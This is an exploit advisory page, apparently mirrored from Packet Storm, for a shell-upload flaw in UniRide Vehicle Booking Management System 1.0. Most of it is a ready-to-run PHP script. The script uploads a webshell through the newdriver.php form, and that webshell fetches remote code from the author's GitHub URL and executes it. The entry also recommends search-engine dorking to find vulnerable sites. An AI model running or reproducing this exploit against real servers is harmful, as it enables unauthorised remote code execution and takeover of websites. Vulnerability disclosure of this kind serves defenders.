Lucene search
K

UniRide Vehicle Booking Management System 1.0 Shell Upload

🗓️ 12 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 224 Views

UniRide Vehicle Booking Management System 1.0 vulnerable to code injection via file upload.

Code
=============================================================================================================================================
    | # Title     : UniRide Vehicle Booking Management System 1.0 Code Injection Vulnerability                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-management-zip.zip               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] uses the CURL to Allow Remotely upload and run malicious file .
    
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php target.dz
    
    [+] PayLoad :
    
    <?php
    
    function file_upload($target_ip) {
        $file_name = "indoushka.php";
        $webshell_payload = "<?php
            \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
            \$ch = curl_init();
            curl_setopt(\$ch, CURLOPT_URL, \$url);
            curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
            \$output = curl_exec(\$ch);
            curl_close(\$ch);
            if (\$output) {
                include 'data://text/plain;base64,' . base64_encode(\$output);
            }
        ?>";
    
        $post_fields = array(
            
            'submit' => '',
            'drname' => 'indoushka',
            'drjoin' => '16/12/1986',
            'drmobile' => '0771818860',
            'drnid' => '336699',
            'drlicense' => '2009-2024',
            'drlicensevalid' => 'yes',
            'draddress' => 'yes',
    		'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
    		
            'qty' => '1'
        );
    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$target_ip/newdriver.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        echo "(+) Shell uploaded successfully.\n";
        echo "(+) Access the shell at: $target_ip/picture/\n";
    }
    
    if ($argc != 2) {
        echo "(+) Usage: php " . $argv[0] . " <target ip>\n";
        echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";
        exit(-1);
    }
    
    $target_ip = $argv[1];
    file_upload($target_ip);
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation